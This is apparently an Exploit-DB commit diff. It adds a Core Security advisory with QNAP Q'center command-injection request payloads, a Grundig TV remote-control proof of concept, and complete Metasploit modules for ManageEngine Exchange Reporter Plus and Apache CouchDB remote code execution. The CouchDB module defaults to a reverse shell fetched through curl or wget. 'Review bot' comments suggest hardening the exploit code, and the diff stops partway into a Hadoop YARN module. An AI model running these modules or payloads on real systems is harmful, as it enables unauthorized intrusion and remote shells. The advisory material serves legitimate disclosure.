DB: 2018-07-14

10 changes to exploits/shellcodes

G DATA Total Security 25.4.0.3 - Activex Buffer Overflow

Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)

HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)
HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)

IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)
IBM QRadar SIEM - Remote Code Execution (Metasploit)
Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)
Apache CouchDB - Arbitrary Command Execution (Metasploit)
phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)
Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)

Dolibarr 3.2.0 < Alpha - File Inclusion
Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion

Dolibarr ERP/CRM - OS Command Injection
Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection

Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection
Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection

Dolibarr CMS 3.5.3 - Multiple Vulnerabilities
Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities

Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting
Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting
Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections
Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection
Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection
Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections
Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection
Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection

Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection
Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection

Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities

Dolibarr 7.0.0 - SQL Injection
Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection

Dolibarr ERP CRM  < 7.0.3 - PHP Code Injection
Dolibarr ERP/CRM  < 7.0.3 - PHP Code Injection

ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution

WAGO e!DISPLAY 7300T - Multiple Vulnerabilities
QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities
Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure
Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2018-07-14 05:01:50 +00:00
parent e76244b41a
commit b374aca9a3
11 changed files with 1915 additions and 15 deletions


@ -0,0 +1,398 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
1. *Advisory Information*
Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0006
Advisory URL:
http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities
Date published: 2018-07-11
Date of last update: 2018-07-11
Vendors contacted: QNAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Information Exposure [CWE-200], Command Injection [CWE-77],
Command Injection [CWE-77], Command Injection [CWE-77],
Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709,
CVE-2018-0710
3. *Vulnerability Description*
QNAP's website states that:
[1] Q'center Virtual Appliance is a central management platform that
enables you to consolidate the management of multiple QNAP NAS. The
Q'center web interface gives you the ease-of-use, cost-efficiency,
convenience and flexibility to manage multiple NAS, across multiple
sites, from any internet browser.
The platform's provides centralized web-based administration to manage
the following features:
- Review HDD S.M.A.R.T. values
- Monitor system status
- Manage apps and shared folders
- Review infographice reports
Multiple vulnerabilities were found in the Q'center Virtual Appliance
web console that would allow an attacker to execute arbitrary commands
on the system.
4. *Vulnerable versions*
. Q'center Virtual Appliance Version 1.6.1056 (20170825)
. Q'center Virtual Appliance Version 1.6.1075 (20171123)
Other products and versions might be affected, but they were not tested.
5. *Vendor Information, Solutions and Workarounds*
QNAP published the following Security Note:
. https://www.qnap.com/en-us/security-advisory/nas-201807-10
6. *Credits*
These vulnerabilities were discovered and researched by Ivan Huertas
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
QNAP's Q'center Virtual Appliance web console includes a functionality
that would allow an authenticated attacker to elevate privileges on the
system. We describe this issue in section 7.1.
Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command
execution.
7.1. *Privilege escalation*
[CVE-2018-0706]
The application contains an API endpoint that returns information about
the accounts defined in the database. The information returned is
informative for all the users except for the admin user, which cames
with every installation, where an extra field is presented. This extra
field (new_password) contains the password defined at installation time
for the admin user encoded in base64.
Any authenticated user could access this API endpoint and retrieve the
admin user's password, therefore being able to login as an administrator.
The following proof of concept shows a user with viewer access
retrieving the admin's password encoded in base64 in the new_password
field.
/-----
GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432;
_ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false
Connection: close
HTTP/1.1 200 OK
Date: Thu, 01 Mar 2018 19:23:43 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/json
Content-Length: 878
Connection: close
{
"total_count": 2,
"account": [
{
"dst_enable": false,
"name": "admin",
"default": true,
"new_password": "YWRtaW5pc3RyYWRvcg==",
"authentication": 0,
"create_time": {
"$date": 1519917983616
},
"role": 4294967295,
"timezone_code": 17,
"last_login": {
"$date": 1519929869797
},
"_id": "5a981b9f3af7e2030c883592",
"email": "",
"description": "administrator"
},
{
"dst_enable": false,
"name": "viewer",
"register_code": "",
"authentication": 0,
"create_time": {
"$date": 1519929122332
},
"role": 1082130432,
"timezone_code": 17,
"last_login": {
"$date": 1519932215818
},
"_id": "5a9847223af7e2034924e7b6",
"email": "",
"description": ""
}
]
}
-----/
As can be seen in the following excerpt, the decoded base64 data
corresponds to the plaintext administrator password set at installation
time.
/-----
$ echo YWRtaW5pc3RyYWRvcg== | base64 -d
administrador
-----/
7.2. *Command Execution in change password for the admin user*
[CVE-2018-0707]
When the admin user performs a password change, the application executes
an OS command to impact the changes. The input is not properly sanitized
when passed down to the OS, allowing an attacker to run arbitrary
commands.
/-----
POST /qcenter/hawkeye/v1/account?change_passwd HTTP/1.1
Host: 192.168.1.209
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.209/qcenter/
Content-Length: 118
Cookie: CMS_lang=ENG; user=admin; CMS_SID=TWYH7A55X5; ROLE=4294967295;
_ID=5a8465ba3af7e2030984c84e; LOGIN_TIME=1518714672547;
AUTHENTICATION=0; TIMEZONE_CODE=17; DST_ENABLE=False; remember=false
Connection: close
{"_id":"5a8465ba3af7e2030984c84e","old_password":"dGlzMzhhZWw=","new_password":"Ijt0b3VjaCAvdG1wL2NoYW5nZXBhc3M7Ig=="}
-----/
The API requires to send the password encoded in base64. This makes a
lot easier to inject command as we do not need to bypass any filters.
For the admin user in the web application, there is also a backing user
present on the OS. When a password change is requested for this user,
the values submitted to the API are included in a "sudo passwd" command,
where the injection occurs.
In this particular case, the old_password must match the current
password, which can be obtained by exploiting [CVE-2018-0706].
7.3. *Command Execution in network config update*
[CVE-2018-0708]
The admin user created at installation time can modify the network
configuration. In order to do this, the admin has to access the settings
section which is protected by the OS password (which could be obtained
using the Privilege Escalation vulnerability described above). However,
we identified that a user with the Power User profile could also execute
this function, despite access not being provided through the web
application interface. This function requires to send the admin user
password encoded in base64 in the passwd field. This value is then used
to perform a sudo operation in the OS to change the network settings. We
used the passwd field to inject command
(";touch /tmp/netconfigpower; echo "a) and create a file in /tmp/.
/-----
POST /qcenter/hawkeye/v1/network_config HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Content-Length: 87
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
Connection: close
{"type":"0","dns_type":"0","passwd":"Ijt0b3VjaCAvdG1wL25ldGNvbmZpZ3Bvd2VyOyBlY2hvICJh"}
-----/
The passwd parameter is used in bash echo command unsanitized.
7.4. *Command Execution in date config update*
[CVE-2018-0709]
The admin user created at installation time is capable of modifying the
date configuration. In order to do this, the admin has to access the
settings section which is protected by the OS password (which could be
obtained using the Privilege Escalation vulnerability described above).
However, we identified that a user with the Power User profile could
execute this function, despite the access is not provided through the
web application interface. This function requires to submit the admin
user password encoded in base64 in the passwd field. This value is then
used to perform a sudo operation in the OS to change the date
configuration settings. We used the passwd field to inject command
(";touch /tmp/date_config;echo"lalala) and create a file in /tmp/.
/-----
POST /qcenter/hawkeye/v1/date_config HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Content-Length: 153
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
Connection: close
{"listValue":18,"type":"1","datefield":1518663600000,"passwd":"Ijt0b3VjaCAvdG1wL2RhdGVfY29uZmlnO2VjaG8ibGFsYWxh","date":"20180215","time":"16:40:31"}
-----/
The passwd parameter is used in bash echo command unsanitized.
7.5. *Command Execution in SSH settings config update*
[CVE-2018-0710]
The admin user created at installation time is capable of modifying the
SSH configuration. In order to do this, the admin has to access the
settings section which is protected by the OS password (which could be
obtained using the Privilege Escalation vulnerability). However, we
identified that a user with the Power User profile could execute this
function, despite the access is not provided through the web application
interface. This function requires to submit the admin user password
encoded in base64 in the passwd field. This value is then used to
perform a sudo operation in the OS to change the date configuration
settings. We used the passwd field to inject command
("";touch /tmp/ssh; echo "lalalala) and create a file in /tmp/.
/-----
POST /qcenter/hawkeye/v1/ssh_setting_config HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Content-Length: 82
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
Connection: close
{"ssh_enable":1,"port":22,"passwd":"Ijt0b3VjaCAvdG1wL3NzaDsgZWNobyAibGFsYWxhbGE="}
-----/
The passwd parameter is used in bash echo command unsanitized.
8. *Report Timeline*
2018-03-13: Core Security sent an initial notification to QNAP,
including a draft advisory.
2018-03-14: QNAP replied that they received the draft version of the
advisory and that they would review it.
2018-03-23: Core Security requested a status update.
2018-04-10: Core Security requested a confirmation about the reported
vulnerabilities and a tentative timescale to fix them.
2018-04-12: QNAP answered saying that they were unable to reproduce the
reported vulnerabilities and asked for more detailed information to
reproduce them.
2018-04-13: Core Security sent a more detailed guide to test.
2018-04-16: QNAP confirmed reception.
2018-04-26: Core Security requested a status update.
2018-04-29: QNAP confirmed the reported vulnerabilities and informed
that their software team were working in a fixed version.
2018-05-21: Core Security requested a status update.
2018-05-28: QNAP informed that a new version of Q'center would be
release by the week of June 4.
2018-05-28: Core Security thanked for the update and proposed June 13th
as publication date.
2018-05-29: QNAP answered saying that the new Q'center release was
delayed and asked to postpone the publication a week later.
2018-05-29: Core Security asked for a solidified release date in order
to go public at the same time.
2018-06-04: QNAP informed that they didn't have a confirmed date yet.
2018-06-08: Core Security asked QNAP for a status update.
2018-06-12: QNAP notified that Q'center was under testing, for that
reason they didn't have a confirmed release date.
2018-06-25: Core Security asked again for a status update.
2018-06-27: QNAP replied that they were expecting to release their
security advisory next week Thursday or Friday.
2018-06-28: Core Security informed QNAP that recommend vendors not to
publish near the weekend and proposed Wednesday July 11th as the
publication date.
2018-07-02: Core Security asked for a confirmation about the proposed
date.
2018-06-27: QNAP confirmed July 11th as the publication date.
2018-07-11: Advisory CORE-2018-0006 published.
9. *References*
[1] https://www.qnap.com/solution/qcenter/index.php
10. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security*
Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.
Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com
12. *Disclaimer*
The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
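Review bot: the Report Timeline in section 8 has an out-of-order entry, "2018-06-27: QNAP confirmed July 11th as the publication date", placed after the 2018-07-02 request it answers; the date is almost certainly a typo and should be corrected before this advisory is archived. Also, section 7.5 says the passwd value is "used to perform a sudo operation in the OS to change the date configuration settings", which is copied from section 7.4 and should refer to the SSH configuration the section is about.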


@ -0,0 +1,34 @@
# Exploit Title: Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
# Date: 2018-07-§3
# Exploit Author: Ahmethan-Gultekin - t4rkd3vilz
# Vendor Homepage: https://www.grundig.com/
# Software Link: https://play.google.com/store/apps/details?id=arcelik
# Version: Before > Smart Inter@ctive 3.0
# Tested on: Kali Linux
# CVE : CVE-2018-13989
# I'm trying my TV.I saw a Grundig remote control application on
# Google Play. Computer I downloaded and decompiled APK.
# And I began to examine individual classes. I noticed in a class
# that a request was sent during operations on the command line.
# I downloaded the phone packet viewer and opened the control application and
# made some operations. And I saw that there was such a request;
# PoC
request ->
GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1
Host: 192.168.1.106:8085
Connection : Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
response ->
HTTP/1.1 200 OK
Content-Type : text/plain
# Set rc key is handled for key id : -2544 key symbol : -4081
# The only requirement for the connection between the TV and the application
# was to have the same IP address. After I made the IP address on the TV
# and the phone and the IP address on the computer the same:
# I accessed the interface from the 8085 port. Now I could do anything from the computer :)
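Review bot: the header line "# Date: 2018-07-§3" contains a garbled character and needs a valid date, and "# Version: Before > Smart Inter@ctive 3.0" does not say which versions are affected. More importantly, the PoC shows only a direct, unauthenticated GET /sendrcpackage on port 8085 with no cross-origin trigger, so the title "Cross-Site Request Forgery" is not supported by what is shown; either include the cross-origin trigger the title implies or describe the finding as missing authentication on the TV's LAN control API.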

91
exploits/java/remote/45018.rb Executable file

@ -0,0 +1,91 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability that
exists in Exchange Reporter Plus <= 5310, caused by execution of
bcp.exe file inside ADSHACluster servlet
},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek <kacperszurek@gmail.com>'
],
'References' =>
[
['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html']
],
'Platform' => ['win'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Jun 28 2018',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),
Opt::RPORT(8181),
])
end
def bin_to_hex(s)
s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
end
def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
})
unless res
vprint_error 'Connection failed'
return CheckCode::Safe
end
unless res.code == 200
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end
begin
json = res.get_json_document
raise if json.empty? || !json['BUILD_NUMBER']
rescue
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end
vprint_status "Version: #{json['BUILD_NUMBER']}"
if json['BUILD_NUMBER'].to_i <= 5310
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
'vars_post' => {
'MTCALL' => "nativeClient",
'BCP_RLL' => "0102",
'BCP_EXE' => bin_to_hex(generate_payload_exe)
}
})
end
end
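Review bot: `exploit` ignores the response from the ADSHACluster POST, so a connection failure or a non-200 reply leaves the operator with no feedback; assign the result to `res`, call `fail_with(Failure::Unreachable, ...)` when it is nil, and report the status code otherwise. In `check`, the bare `raise` inside `begin`/`rescue` exists only to jump into the rescue branch, which is hard to read; `return CheckCode::Safe unless json['BUILD_NUMBER']` says the same thing directly (`get_json_document` already returns an empty hash on parse failure). The constants `'MTCALL' => "nativeClient"` and `'BCP_RLL' => "0102"` also deserve a comment explaining what the servlet does with them, since the description only says the servlet executes the supplied bcp.exe.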

317
exploits/linux/remote/45019.rb Executable file

@ -0,0 +1,317 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache CouchDB Arbitrary Command Execution',
'Description' => %q{
CouchDB administrative users can configure the database server via HTTP(S).
Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,
including downloading and executing scripts from the public internet.
},
'Author' => [
'Max Justicz', # CVE-2017-12635 Vulnerability discovery
'Joan Touzet', # CVE-2017-12636 Vulnerability discovery
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' => [
['CVE', '2017-12636'],
['CVE', '2017-12635'],
['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],
['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']
],
'DisclosureDate' => 'Apr 6 2016',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/shell_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'curl'
},
'CmdStagerFlavor' => ['curl', 'wget'],
'Targets' => [
['Automatic', {}],
['Apache CouchDB version 1.x', {}],
['Apache CouchDB version 2.x', {}]
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(5984),
OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),
OptString.new('HttpUsername', [false, 'The username to login as']),
OptString.new('HttpPassword', [false, 'The password to login with'])
])
register_advanced_options([
OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
])
end
def check
get_version
version = Gem::Version.new(@version)
return CheckCode::Unknown if version.version.empty?
vprint_status "Found CouchDB version #{version}"
return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
CheckCode::Safe
end
def exploit
fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
version = @version
vprint_good("#{peer} - Authorization bypass successful") if auth_bypass
print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager")
@cmdstager = generate_cmdstager(
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path)
).join(';')
register_file_for_cleanup(cmdstager_path)
if !datastore['Attempts'] || datastore['Attempts'] <= 0
attempts = 1
else
attempts = datastore['Attempts']
end
attempts.times do |i|
print_status("#{peer} - The #{i + 1} time to exploit")
send_payload(version)
Rex.sleep(5)
# break if we get the shell
break if session_created?
end
end
# CVE-2017-12635
# The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,
# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
# for the newly created user.
def auth_bypass
username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)
password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)
@auth = basic_auth(username, password)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
'method' => 'PUT',
'ctype' => 'application/json',
'data' => %({"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"})
)
if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']
return true
else
return false
end
end
def get_version
@version = nil
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'authorization' => @auth
)
rescue Rex::ConnectionError
vprint_bad("#{peer} - Connection failed")
return false
end
unless res
vprint_bad("#{peer} - No response, check if it is CouchDB. ")
return false
end
if res && res.code == 401
print_bad("#{peer} - Authentication required.")
return false
end
if res && res.code == 200
res_json = res.get_json_document
if res_json.empty?
vprint_bad("#{peer} - Cannot parse the response, seems like it's not CouchDB.")
return false
end
@version = res_json['version'] if res_json['version']
return true
end
vprint_warning("#{peer} - Version not found")
return true
end
def send_payload(version)
vprint_status("#{peer} - CouchDB version is #{version}") if version
version = Gem::Version.new(@version)
if version.version.empty?
vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.")
# if target set Automatic, exploit failed.
if target == targets[0]
fail_with(Failure::NoTarget, "#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.")
elsif target == targets[1]
payload1
elsif target == targets[2]
payload2
end
elsif version < Gem::Version.new('1.7.0')
payload1
elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
payload2
elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')
fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
end
end
# Exploit with multi requests
# payload1 is for the version of couchdb below 1.7.0
def payload1
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
rand_hex = Rex::Text.rand_text_hex(32)
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
register_file_for_cleanup(rand_file)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
'method' => 'PUT',
'authorization' => @auth
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %({"_id": "#{rand_hex}"})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"language":"#{rand_cmd1}","map":""})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("/bin/sh #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"language":"#{rand_cmd2}","map":""})
)
end
# payload2 is for the version of couchdb below 2.1.1
def payload2
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)
rand_hex = Rex::Text.rand_text_hex(32)
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
register_file_for_cleanup(rand_file)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_membership"),
'method' => 'GET',
'authorization' => @auth
)
node = res.get_json_document['all_nodes'][0]
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
'method' => 'PUT',
'authorization' => @auth
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %({"_id": "#{rand_hex}"})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("/bin/sh #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"})
)
end
def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
end
end
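Review bot: in `send_payload`, the branch `elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')` is always true because the right-hand operand is a bare `Gem::Version` object rather than a comparison; since the preceding branches already handle `< 1.7.0` and `2.0.0..2.1.0`, everything else is not vulnerable and the branch should simply be `else`. Separately, `payload2` does `res.get_json_document['all_nodes'][0]` on the `_membership` response without checking that `res` is non-nil or that `all_nodes` is present, which turns a transient connection failure into a `NoMethodError` instead of a `fail_with` message; `get_version` already shows the right pattern for this.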

92
exploits/linux/remote/45025.rb Executable file

@ -0,0 +1,92 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
'Description' => %q{
